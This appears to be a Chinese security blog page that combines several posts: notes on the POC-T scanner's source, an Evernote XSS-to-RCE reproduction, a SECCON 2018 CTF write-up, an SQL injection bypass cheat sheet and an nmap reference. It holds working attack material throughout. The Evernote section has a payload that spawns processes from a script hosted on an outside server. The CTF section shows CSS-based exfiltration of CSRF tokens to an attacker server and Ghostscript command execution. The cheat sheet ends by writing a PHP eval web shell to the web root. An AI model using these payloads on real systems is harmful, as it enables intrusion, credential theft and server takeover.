MENU

POC-T源码阅读(开个坑)

https://github.com/Xyntax/POC-T 这是作者Github地址,可前往下载及使用。

本文是我作为一个完全不会编程的小白尝试去阅读并且理解作者的代码及其思想的一个过程。

1514989268261451.jpg

框架主要依赖于Python2.7
提前准备:

首先安装python2.7与pip,在requirement.txt中需要pip几个库
requests http://docs.python-requests.org/zh_CN/latest/ 中文文档
gevent 正在学习
shodan shodan的API库
google-api-python-client 谷歌搜索的API库
logging:https://y4er.com/post/python-logging/ (在POC-T与sqlmap中均有使用到)
整体目录:

data
--pass100.txt
--pass1000.txt
--user-agent.txt
--wooyun.domain
doc
--banner.png
--UCENSE.txt
--usage.png
lib
--api
--controller
--core
--parse
--utils
---__init.py
---cli.py
debug.py
plugin
---init__.py
---cloudeye.py
---extracts.py
---static.py
---urlparser.py
---useragent.py
---util.py
script
---__init.py__
---activemq.upload.py
---...
---...
thirdparty
--ansistrm
--colorama
--httplib2
--IPY
--odice
--termcolor
---__init.py
POC-T.py
requirement.txt
toolkit.conf

在toolkit.conf中配置相关key

印象笔记 Windows 客户端 6.15 本地文件读取和远程命令执行漏洞(CVE-2018-18524)复现

原文地址:https://paper.seebug.org/736/

印象笔记 Windows 客户端 6.14 储存型 XSS 漏洞
我现在百度上下载了一个6.14版本的进行原先的存储型XSS测试

1.png

先上传一张图片,然后进行改名
2.png
双击点开图片
3.png
接下来下载了一个6.15版本,将原先的图片双击
4.png

还是可以触发原先的xss的
本地文件读取 和 远程命令执行的实现

在6.14中将图片更名为" onclick="alert(1)"><script src="http://server:8000/1.js">.jpg

在虚拟机中开启phpstudy,然后根目录1.js

内容:

// command executed
try{
  spawn_sync = process.binding('spawn_sync');
  envPairs = [];
  for (var key in window.process.env) {
    envPairs.push(key + '=' + window.process.env[key]);
  }
  args = [];

  const options = {
    file: 'C:\\\\Windows\\system32\\calc.exe',
    args: args,
    envPairs: envPairs,
    stdio: [
      { type: 'pipe', readable: true, writable: false },
      { type: 'pipe', readable: false, writable: true },
      { type: 'pipe', readable: false, writable: true } 
    ]
  };
  spawn_sync.spawn(options);
}
catch(err){
  alert(err);
}

在印象笔记 笔记—演示

5.png

SECCON 2018 - Web Ghostkingdom 复现

题目地址:
http://ghostkingdom.pwn.seccon.jp/FLAG/

ctf.png

题目意思是需要命令执行读取或者getshell

1.png

点击 Go to Top进来是一个登陆页面,注册一个账户登陆。
2.png

菜单这里有三个功能点

第一个功能点:
3.png
给管理员发送消息,可以发送两种类型,正常和着急,功能都是一样的。
4.png
在浏览器中可以看到css=c3BhbntiYWNrZ3JvdW5kLWNvbG9yOnJlZDtjb2xvcjp5ZWxsb3d9
进行base64解密看到css= span{background-color:red;color:yellow}

5.png

值在源代码中可以看到在橙色标注处。
6.png
输入的stb在橙色标注处。

尝试输入

7.png

8.png

从这里可以看到尖括号被转义了。
那么 xss 的注入点被限制到了很小的范围,我们仅能通过 <style>span {background: url(xxx)}</style> 的方式发起特定的 GET 请求。
意思就是通过css去访问,详情见css background属性。

第二个功能点:Take a screenshot(截取屏幕截图)
第二项功能比较简单,程序会去访问你指定的 URL 并将相应的结果返回:

9.png

这里用贴吧进行了截图实验,可以看出这里是一个ssrf
10.png

这里提示了您不能使用包含以下关键字的URL:127,:: 1,local
你不能使用local 127 等关键字
11.png
使用http://0.0.0.0 绕过限制,代表的是本机所有ip地址

12.png

XSS + SSRF获取本地登录cookie

在发送消息处看到csrf值与cookies值一样
13.png

如果我们获得了本地的cookies,就可以使用第三个功能点上传了

看了先知的wp,这里可以使用css选择器进行xss
利用 css 选择器进行 xss,泄露出页面的敏感信息。在这里,我们需要泄露的敏感信息是 <input type="hidden" name="csrf" value="48cab678ef3b27b008e60d"> 标签的 value 信息,所以我们可以这样来写 payload:
input[value^=”str”]{backround: url(http://your_server/?csrf=str)}
解释一下,css选择器可以利用这种方式,从开始处匹配input中value参数的值。如果成功匹配则访问后面的url。(^=从左至右匹配,$=从右至左匹配,

可以这样子写payload,csrf是22位,所以需要猜解22位。

input[value^="0"] {background: url(http://server?csrf=0)}
input[value^="1"] {background: url(http://server?csrf=1)}
input[value^="2"] {background: url(http://server?csrf=2)}
input[value^="3"] {background: url(http://server?csrf=3)}
input[value^="4"] {background: url(http://server?csrf=4)}
input[value^="5"] {background: url(http://server?csrf=5)}
input[value^="6"] {background: url(http://server?csrf=6)}
input[value^="7"] {background: url(http://server?csrf=7)}
input[value^="8"] {background: url(http://server?csrf=8)}
input[value^="9"] {background: url(http://server?csrf=9)}
input[value^="a"] {background: url(http://server?csrf=a)}
input[value^="b"] {background: url(http://server?csrf=b)}
input[value^="c"] {background: url(http://server?csrf=c)}
input[value^="d"] {background: url(http://server?csrf=d)}
input[value^="e"] {background: url(http://server?csrf=e)}
input[value^="f"] {background: url(http://server?csrf=f)}

这里用到一个服务端代码来获取csrf_token
14.png
我们可以用python构造payload

15.png
操作过程如下,得使用功能2的ssrf进行访问我们自己的服务器,获取值
1.通过 SSRF 访问 http://0.0.0.0/?user=密码&pass=账号&action=login 在服务端登录,因为需要获取到以localhost身份登陆之后的cookies

16.png
2.通过 SSRF 访问 http://0.0.0.0/?css=payload&action=msgadm2 触发 XSS,逐个字节爆破你的cookie(在服务端里自己的cookie)
3.使用python脚本生成payloads

17.png

猜解出第一位之后把第一位写到value中
访问自己搭建好的脚本进行token写入value中,依次推出
成功获得 cookie值为: b9a0ef701d4b30dXXX1244
然后就可以使用该cookie了,可以看到已经可以上传文件了

18.png
接下来随便上传一个PHP文件
19.png
可以看到报错了,看报错内容
根据报错搜索可以得到相应程序使用的库:imagemagick,然后继续搜索 imagemagick 相关的漏洞,得到 Ghostscript命令执行漏洞,结合题目标题 ghostkingdom,很明显地提示了相应考点:ghostscript 的命令执行
首先上传内容为:
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%$(ls /var/www/html/FLAG/)) currentdevice
putdeviceprops
的一个jpg文件尝试
再次尝试看内容:

20.png
已经看到FLAG文件名,再次修改poc为:
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%$(cat /var/www/html/FLAG/FLAGflagF1A8.txt)) currentdevice putdeviceprops
的一个JPG文件进行尝试:
21.png

Flag就出来了,很有意思的一道题目。
原WP:https://xz.aliyun.com/t/3075
参考:http://www.evi1.cn/2018/11/01/SECCON-18-web%E5%A4%8D%E7%8E%B0/
http://www.cnblogs.com/wushangguo/p/9523130.html

Sql-Cheat-Sheet

常见注入方式
1.Boolean-based blind 布尔盲注
2.Error-based 报错注入
3.AND/OR time-based blind 时间盲注
4.UNION query 联合注入

常用函数
判断是否具有读写权限
注入绕过
1.字段列数不够
2.过滤空格
3.过滤from x
4.过滤逗号
5.过滤大于小于
6.运算比较之空格过滤
7.过滤and or xor not
8.万能密码之or and优先级
9.过滤引号
10.过滤tables
11.过滤select
12.过滤union

  1. 过滤=
    14.过滤updatexml及extractvalue

15.组合过滤之 preg_match('/(and|or|union|where)/i',$id)
16.组合过滤之 preg_match('/(and|or|union|where|limit)/i', $id)
17.组合过滤之 preg_match('/(and|or|union|where|limit|group by)/i', $id)
18.组合过滤之 preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
19.过滤 column
20.order by 注入
tips
1.爆所有表列
2.利用报错发现库表列
3.getshell
常见注入方式
1.Boolean-based blind

left() 用法:left(str, length),即:left(被截取字符串, 截取长度)

mysql> select*fromtestwhereid=1 and left(version(),1)=8;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

ascii()转为ascii编码
substr(string string,num start,num length);

substr()string为字符串;start为起始位置;length为长度。

mysql> select*fromtestwhereid=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=101;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

2.Error-based

mysql> select from test where id=1 union select version(),@@version_compile_os,floor(rand(0)2)x from information_schema.character_sets group by x;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
8.0.12osx10.130
8.0.12osx10.131

3.AND/OR time-based blind

mysql> select * from test where id=1 and sleep(2);
idusernamepassword

Time: 2.053s

mysql> select * from test where id=1 or sleep(2);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

Time: 6.226s
4.UNION query

mysql> select from test where id=1 union select from test;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb

常用函数
concat:将多个字符串连接成一个字符串
group_concat:返回一个字符串结果,该结果由分组中的值连接组合而成
concat_ws: concat with separator 指定参数之间的分隔符
system_user():系统用户名
user():用户名
current_user:当前用户名
session_user():连接数据库的用户名
database():数据库名
version():数据库版本
load_file():读取本地文件的函数
@@datadir:读取数据库路径(5.0 以上版本)
@@basedir:安装路径
@@version_complie_os:操作系统
@@HOSTNAME 主机名
判断是否具有读写权限
读取

mysql> selectfromtestwhereid=1 and (select count() from mysql.user)>0
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

写入

mysql> select*fromtestwhereid=1 and (select count(file_priv) from mysql.user)>0
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select*fromtestwhereid=1 and (select count(file_priv) from mysql.user)<0
idusernamepassword

注入绕过
1.字段列数不够
mysql> select from test where id=1 union select null,floor(rand(0)2)x from information_schema.tables group by x;
(1222, u'The used SELECT statements have a different number of columns'')

floor函数返回小于等于该值的最大整数.

mysql> select from test where id=1 union select null,null,floor(rand(0)2)x from information_schema.tables group by x; -- 用null或者其他字符填充
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
<null><null>0
<null><null>1

2.过滤空格

mysql> select(username)from(test)where(id)=1;
username
admin
mysql> select * from test where id=1E0union select 1,2,3 --浮点数 1.0
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
123
mysql> selectfrom//test//where/*/id=1;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select*fromtestwhereid=2;
idusernamepassword
2root63a9f0ea7bb98050796b649e85481845
mysql> select*fromtestwhereid=1 union select@1=@1,2,3;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
<null>23
mysql> select*fromtestwhereid=1 union select@1,2,3;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
<null>23

备注: 一个 @ 表示用户定义,@@ 表示系统变量
在php中 s 会匹配0x09,0x0a,0x0b,0x0c,0x0d,0x20
09:Horizontal Tab
0A:New Line
0B:Vertical Tab
0C:New Page
0D:Carriage Return
A0:MySQL 中 %a0 代表空白符,可以代替空格
20:Space
a0:空格
2B:+
2D:-
7E:~
21:!
40:@
SQLite3:0A 0D 0C 09 20
MySQL5 09:0A 0B 0C 0D A0 20
PosgresSQL:0A 0D 0C 09 20
Oracle 11g:00 0A 0D 0C 09 20
MSSQL:01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
3.过滤from x

mysql> select * from. test;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb

4.过滤逗号
使用 mid(user() from 1 for 1) 或 substr(user() from 1 for 1)

mysql> select * from test where id=1 and (select ascii(substr(user() from 1 for 1)))=114;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1 and (substr(user() from 1 for 1))='r';
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test limit 1 offset 2;
idusernamepassword
3test098f6bcd4621d373cade4e832627b4f6
mysql> select * from ((select 1)A join (select 2)B join ((select username from test where id=2))D); -- 相当于:UNION SELECT 1,2,3;
12username
12root

5.过滤大于小于
greatest(x,y),返回x和y中较大的那个数 当然可以用非等于 !=

mysql> select greatest(ascii(mid(user(),1,1)),120)=120;
greatest(ascii(mid(user(),1,1)),120)=120
1

以上是判断user()第一个字符的ascii码是否等于120. 若最终结果为120,返回true(1),否则返回false(0),可编写脚本枚举
6.运算比较之空格过滤

mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=110);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=114);
idusernamepassword
mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=114);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=115);
idusernamepassword

乘法和除法当然也可以
7.过滤and or xor not
and=&& or=|| xor=| not=! 注意在浏览器中输入部分字符需要url编码,例如&&为%26%26

mysql> select * from test where id=1(ascii(substr(database(),1,1))=116);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb
mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=116);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=115);
idusernamepassword
绕过:^, =, !=, %, /, *, &, &&,,, <, >, >>, <<, >=, <=, <>, <=>, XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...

8.万能密码之or and优先级
mysql> select * from test where username='nouser' or '1'='1' or '1'='1' -- - and password='123';

idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb
mysql> select * from test where username='nouser' and password='123' or '1'='1';
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb

9.过滤引号

mysql> select * from test where username=0x61646d696e;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select * from test where username=CHAR(97, 100, 109, 105, 110);
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

10.过滤tables

mysql> select table_name from information_schema.partitions where table_schema=database();
TABLE_NAME
test
mysql> select table_name from information_schema.statistics where table_schema=database();
TABLE_NAME
test
mysql> select table_name from information_schema.table_constraints where table_schema=database();
table_name
test
mysql> select table_name from information_schema.KEY_COLUMN_USAGE where table_schema=database();
table_name
test

11.过滤select
(布尔|延时)盲注即可,也可以参考第6条

mysql> select*fromtestwhereid=1 and ascii(substr(database(),1,1))=116;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select*fromtestwhereid=1 and if(ascii(substr(database(),1,1))=116,sleep(5),1);
idusernamepassword

Time: 5.081s
12.过滤union
盲注或者子查询猜解.最好还是编写脚本

mysql> select*fromtestwhereid=2 and (select username from test where id=1)='admin';
idusernamepassword
2root63a9f0ea7bb98050796b649e85481845
  1. 过滤=
    使用like 、rlike 、regexp 或者 使用< 或者 >
mysql> select * from test where id=1 union select 1,2,table_name from information_schema.tables where table_name between 0x61 and 0x7a;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
12CHARACTER_SETS
12COLLATION_CHARACTER_SET_APPLICABILITY
12COLLATIONS
12COLUMN_PRIVILEGES
...................between char(97) and char(122).......................
mysql> select*fromtestwhereid=1 and 1 like 2;
idusernamepassword
mysql> select*fromtestwhereid=1 and 1 like 1;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
mysql> select 1,2,table_name from information_schema.tables where table_name between 'u' and 'v' limit 0,1;
12TABLE_NAME
12USER_PRIVILEGES
mysql> select 1,2,table_name from information_schema.tables where table_name like 'u%' limit 1 offset 1;
12TABLE_NAME
12users
mysql> select 1,2,table_name from information_schema.tables where table_name > 'u' and table_name < 'v' limit 10,1;
12TABLE_NAME
12user_summary

14.过滤updatexml及extractvalue
mysql> selectfromuserswhereid=1 AND polygon((select from(select * from(select user())a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.user() from (select ‘root@localhost’ AS user() from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 AND GeometryCollection((select from (select * from(select version())a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.version() from (select ‘5.5.44-0ubuntu0.14.04.1’ AS version() from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 AND multipoint((select from(select * from(select @@basedir)a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.@@basedir from (select ‘/usr’ AS @@basedir from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 AND multilinestring((select from(select * from(select database())a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.database() from (select ‘test’ AS database() from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 AND LINESTRING((select from(select * from(select @@version_compile_os)a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.@@version_compile_os from (select ‘debian-linux-gnu’ AS @@version_compile_os from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 AND multipolygon((select from(select * from(select @@datadir)a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b.@@datadir from (select ‘/var/lib/mysql/‘ AS @@datadir from dual) b)’ value found during parsing

mysql> selectfromuserswhereid=1 and exp(~(select from (select user() ) a) );
ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’

mysql> selectfromuserswhereid=1 union select from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
ERROR 1060 (42S21): Duplicate column name ‘5.5.44-0ubuntu0.14.04.1’

mysql> selectfromuserswhereid=1 and (select 1 from (select count(),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ‘5.5.44-0ubuntu0.14.04.11’ for key ‘group_key’

15.组合过滤之 preg_match('/(and|or|union|where)/i',$id)
上面基本介绍过了.大家都懂

1 || updatexml(1,concat(0x7e,database(),0x7e),1) -- 超过长度可以配合substr
1 %26%26 extractvalue(1,concat(0x7e,(select database()),0x7e))
1 || (select user from users limit 1) = 'admin'
1 %26%26 if(ascii(substr(database(),1,1))=115,sleep(5),1)
1 || ascii(substr(database(),1,1))=115
16.组合过滤之 preg_match('/(and|or|union|where|limit)/i', $id)

mysql> select*fromtest where id=2(select username from test group by id having id = 1) = 'admin';
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb

报错注入或者盲注,最主要就是解决limit的问题.用having代替即可
17.组合过滤之 preg_match('/(and|or|union|where|limit|group by)/i', $id)

mysql> select*fromtest where id=2(select substr(group_concat(username),1,5) from test) = 'admin';
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3
2root63a9f0ea7bb98050796b649e85481845
3test098f6bcd4621d373cade4e832627b4f6
4testtest05a671c66aefea124cc08b76ea6d30bb
18.组合过滤之 preg_match('/(andorunionwherelimitgroup byselect)/i', $id)
mysql> select*fromtest where id=-2substr(username,1,5) = 0x61646d696e;
idusernamepassword
1admin21232f297a57a5a743894a0e4a801fc3

更新分割线
19.过滤 column
知道表名的前提下join报错爆字段

mysql> selectfromuserswhereid=1 union select 1,2,(select from (select * from users a join users b) c);
ERROR 1060 (42S21): Duplicate column name ‘id’

mysql> selectfromuserswhereid=1 union select 1,2,(select from (select * from users a join users b using(id)) c);
ERROR 1060 (42S21): Duplicate column name ‘username’

mysql> selectfromuserswhereid=1 union select 1,2,(select from (select * from users a join users b using(id,username)) c);
ERROR 1060 (42S21): Duplicate column name ‘password’

20.order by 注入
基于报错

mysql> select*fromusersorder byid=rand(updatexml(1,concat(0x7e,database(),0x7e),1));
ERROR 1105 (HY000): XPATH syntax error: ‘~test~’

mysql> select*fromusersorder byid=1 and updatexml(1,concat(0x7e,database(),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: ‘~test~’

基于返回信息不同

mysql> select*fromusersorder byid=1 and ascii(substr((select database()),1,1))>1;
idusernamepasswordaddress
2root63a9f0ea7bb98050796b649e85481845baidu.com
3test098f6bcd4621d373cade4e832627b4f67xz.cc
4testtest05a671c66aefea124cc08b76ea6d30bb04z.net
1admin21232f297a57a5a743894a0e4a801fc3localhost
mysql> select*fromusersorder byid=1 and ascii(substr((select database()),1,1))<1;
idusernamepasswordaddress
1admin21232f297a57a5a743894a0e4a801fc3localhost
2root63a9f0ea7bb98050796b649e85481845baidu.com
3test098f6bcd4621d373cade4e832627b4f67xz.cc
4testtest05a671c66aefea124cc08b76ea6d30bb04z.net

基于时间

mysql> select*fromusersorder byid=1 and if(1=1,sleep(2),1);
idusernamepasswordaddress
1admin21232f297a57a5a743894a0e4a801fc3localhost
2root63a9f0ea7bb98050796b649e85481845baidu.com
3test098f6bcd4621d373cade4e832627b4f67xz.cc
4testtest05a671c66aefea124cc08b76ea6d30bb04z.net

4 rows in set (2.01 sec)
tips
'=' <--> 'like' <--> 'in' --> 'regexp' <--> 'rlike' --> '>' <--> '<'
1.爆所有表列
(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x)
2.利用报错发现库表列
mysql> select*fromuserswhereusername='admin' and polygon(username);
(1367, u”Illegal non geometric ‘test.users.username‘ value found during parsing”)

3.getshell
show variables like '%plugin%';
show variables like "secure_file_priv";
show variables like '%general_log%';
use mysql;
Drop TABLE IF EXISTS shell;
Create TABLE shell (shell text NOT NULL);
Insert INTO shell (shell) VALUES('<?php @eval($_POST[1]);?>');
select shell from shell into outfile '/var/www/html/1.php';
Drop TABLE IF EXISTS shell;
如果存在堆叠注入直接 id=1';set global general_log = on;

原文地址:

http://04z.net/archives/2030ee36.html

Nmap速查手册

转载自:https://blog.csdn.net/xumesang/article/details/51859437

0x00:说明
只是一个快速查询手册,理论的东西都没有补充,欢迎大家积极在评论区补充自己常用的参数,O(∩_∩)O

0x01:nmap功能介绍
1.主机存活检测
2.端口探测
3.服务识别
4.操作系统识别
5.硬件地址检测
6.服务版本识别
7.漏洞扫描,使用nmap自带脚本
0x02:简单示例
使用ping检测10.0.0.0/24这个网段

nmap -sP 10.0.0.0/24
使用SYN的方法对全端口进行扫描,在aggressive(4)的时间模板下,同时对开放的端口进行端口识别

nmap -p1-65535 -sV -sS -T4 target
PS: -T代表的是扫描的时候,一些控制选项(TCP的延迟时间,探测报文之间的间隔等)的集合,具体的man nmap一下就知道了

使用SYN扫描,在aggressive(4)的时间模板下,探测操作系统的类型和版本,还有显示traceroute的结果,结果输出较为详细

nmap -v -sS -A -T4 target
使用SYN扫描,在insane(5)的时间模板下,探测操作系统的类型和版本,还有显示traceroute的结果,结果输出较为详细

nmap -v -sS -A -T5 target
使用SYN扫描,在insane(5)的时间模板下,探测操作系统的类型,还有显示traceroute的结果,操作系统的类型,结果输出较为详细

nmap -v -sV -O -sS -T5 target
使用SYN的方法对全端口进行扫描,同时对开放的端口进行端口识别,在aggressive(4)的时间模板下,探测操作系统的类型还有显示traceroute的结果,结果输出较为详细

nmap -v -p 1-65535 -sV -O -sS -T4 target
用SYN的方法对全端口进行扫描,同时对开放的端口进行端口识别,在insane(5)的时间模板下,探测操作系统的类型,还有显示traceroute的结果,结果输出较为详细

nmap -v -p 1-65535 -sV -O -sS -T5 target
从文件中读取需要扫描的IP列表

nmap -iL ip-address.txt
Nmap输出格式
扫描的结果输出到屏幕,同时会存储一份到grep-output.txt

nmap -sV -p 139,445 -oG grep-output.txt 10.0.1.0/24
扫描结果输出为html

nmap -sS -sV -T5 10.0.1.99 --webxml -oX - | xsltproc --output file.html
Nmap扫描Netbios
在子网中发现开放netbios的IP

nmap -sV -v -p139,445 10.0.0.1/24
扫描指定netbios的名称

nmap -sU --script nbstat.nse -p 137 target
扫描指定的目标,同时检测相关漏洞

nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 target
将nmap的80端口的扫描结果,通过管道交给nikto进行扫描

Nmap Nikto Scan nmap -p80 10.0.1.0/24 -oG - | nikto.pl -h -
将nmap的80,443端口的扫描结果,通过管道交给nikto进行扫描

nmap -p80,443 10.0.1.0/24 -oG - | nikto.pl -h -
0x03:Nmap参数详解
Nmap支持主机名,ip,网段的表示方式

例如:blah.highon.coffee, namp.org/24, 192.168.0.1;10.0.0-25.1-254

-iL filename 从文件中读取待检测的目标,文件中的表示方法支持机名,ip,网段
-iR hostnum 随机选取,进行扫描.如果-iR指定为0,则是无休止的扫描
--exclude host1[, host2] 从扫描任务中需要排除的主机
--exculdefile exclude_file 排除文件中的IP,格式和-iL指定扫描文件的格式相同
主机发现

-sL 仅仅是显示,扫描的IP数目,不会进行任何扫描
-sn ping扫描,即主机发现
-Pn 不检测主机存活
-PS/PA/PU/PY[portlist] TCP SYN Ping/TCP ACK Ping/UDP Ping发现
-PE/PP/PM 使用ICMP echo, timestamp and netmask 请求包发现主机
-PO[prococol list] 使用IP协议包探测对方主机是否开启
-n/-R 不对IP进行域名反向解析/为所有的IP都进行域名的反响解析
扫描技巧

-sS/sT/sA/sW/sM TCP SYN/TCP connect()/ACK/TCP窗口扫描/TCP Maimon扫描
-sU UDP扫描
-sN/sF/sX TCP Null,FIN,and Xmas扫描
--scanflags 自定义TCP包中的flags
-sI zombie host[:probeport] Idlescan
-sY/sZ SCTP INIT/COOKIE-ECHO 扫描
-sO 使用IP protocol 扫描确定目标机支持的协议类型
-b “FTP relay host” 使用FTP bounce scan
指定端口和扫描顺序

-p 特定的端口 -p80,443 或者 -p1-65535
-p U:PORT 扫描udp的某个端口, -p U:53
-F 快速扫描模式,比默认的扫描端口还少
-r 不随机扫描端口,默认是随机扫描的
--top-ports "number" 扫描开放概率最高的number个端口,出现的概率需要参考nmap-services文件,ubuntu中该文件位于/usr/share/nmap.nmap默认扫前1000个
--port-ratio "ratio" 扫描指定频率以上的端口
服务版本识别

-sV 开放版本探测,可以直接使用-A同时打开操作系统探测和版本探测
--version-intensity "level" 设置版本扫描强度,强度水平说明了应该使用哪些探测报文。数值越高,服务越有可能被正确识别。默认是7
--version-light 打开轻量级模式,为--version-intensity 2的别名
--version-all 尝试所有探测,为--version-intensity 9的别名
--version-trace 显示出详细的版本侦测过程信息
脚本扫描

-sC 根据端口识别的服务,调用默认脚本
--script=”Lua scripts” 调用的脚本名
--script-args=n1=v1,[n2=v2] 调用的脚本传递的参数
--script-args-file=filename 使用文本传递参数
--script-trace 显示所有发送和接收到的数据
--script-updatedb 更新脚本的数据库
--script-help=”Lua script” 显示指定脚本的帮助
OS识别

-O 启用操作系统检测,-A来同时启用操作系统检测和版本检测
--osscan-limit 针对指定的目标进行操作系统检测(至少需确知该主机分别有一个open和closed的端口)
--osscan-guess 推测操作系统检测结果,当Nmap无法确定所检测的操作系统时,会尽可能地提供最相近的匹配,Nmap默认进行这种匹配
防火墙/IDS躲避和哄骗

-f; --mtu value 指定使用分片、指定数据包的MTU.
-D decoy1,decoy2,ME 使用诱饵隐蔽扫描
-S IP-ADDRESS 源地址欺骗
-e interface 使用指定的接口
-g/ --source-port PROTNUM 使用指定源端口
--proxies url1,[url2],... 使用HTTP或者SOCKS4的代理

--data-length NUM 填充随机数据让数据包长度达到NUM
--ip-options OPTIONS 使用指定的IP选项来发送数据包
--ttl VALUE 设置IP time-to-live域
--spoof-mac ADDR/PREFIX/VEBDOR MAC地址伪装
--badsum 使用错误的checksum来发送数据包
Nmap 输出

-oN 将标准输出直接写入指定的文件
-oX 输出xml文件
-oS 将所有的输出都改为大写
-oG 输出便于通过bash或者perl处理的格式,非xml
-oA BASENAME 可将扫描结果以标准格式、XML格式和Grep格式一次性输出
-v 提高输出信息的详细度
-d level 设置debug级别,最高是9
--reason 显示端口处于带确认状态的原因
--open 只输出端口状态为open的端口
--packet-trace 显示所有发送或者接收到的数据包
--iflist 显示路由信息和接口,便于调试
--log-errors 把日志等级为errors/warings的日志输出
--append-output 追加到指定的文件
--resume FILENAME 恢复已停止的扫描
--stylesheet PATH/URL 设置XSL样式表,转换XML输出
--webxml 从namp.org得到XML的样式
--no-sytlesheet 忽略XML声明的XSL样式表
其他nmap选项

-6 开启IPv6
-A OS识别,版本探测,脚本扫描和traceroute
--datedir DIRNAME 说明用户Nmap数据文件位置
--send-eth / --send-ip 使用原以太网帧发送/在原IP层发送
--privileged 假定用户具有全部权限
--unprovoleged 假定用户不具有全部权限,创建原始套接字需要root权限
-V 打印版本信息
-h 输出帮助
0x04:例子
整个子网检测的Netbios

Nmap -sV -v -p 139,445 10.0.1.0/24
Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-11 21:26 GMT
Nmap scan report for nas.decepticons 10.0.1.12
Host is up (0.014s latency).

PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: MEGATRON)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: MEGATRON)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 256 IP addresses (1 hosts up) scanned in 28.74 seconds
Nmap 查找Netbios名称

nmap -sU --script nbstat.nse -p 137 10.0.1.12
Starting Nmap 6.47 ( http://nmap.org ) at 2014-12-11 21:26 GMT
Nmap scan report for nas.decepticons 10.0.1.12
Host is up (0.014s latency).

PORT STATE SERVICE VERSION
137/udp open netbios-ns

Host script results:
|_nbstat: NetBIOS name: STARSCREAM, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)
